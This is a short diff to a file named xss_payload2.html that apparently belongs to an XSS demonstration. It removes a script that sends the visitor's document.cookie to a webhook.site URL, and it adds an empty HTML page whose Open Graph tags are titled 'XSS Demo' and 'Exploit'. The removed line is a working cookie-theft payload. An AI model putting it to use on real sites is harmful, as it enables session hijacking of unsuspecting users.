--- a/xss_payload2.html
+++ b/xss_payload2.html
@@ -1,3 +1,15 @@
-<script>
-  fetch("https://webhook.site/64b963bc-2bfe-4ed0-aa14-b7b423f02b8c?cookie=" + document.cookie);
-</script>
+<!DOCTYPE html>
+<html lang="en">
+    <head>
+        <meta charset="UTF-8" />
+        <title>XSS Demo</title>
+        <meta property="og:title" content="Exploit" />
+        <meta property="og:description" content="This is demo page" />
+        <meta property="og:image" content="https://example.com/image.jpg" />
+        <meta
+            property="og:url"
+            content="https://username.github.io/repo-name/"
+        />
+    </head>
+    <body></body>
+</html>
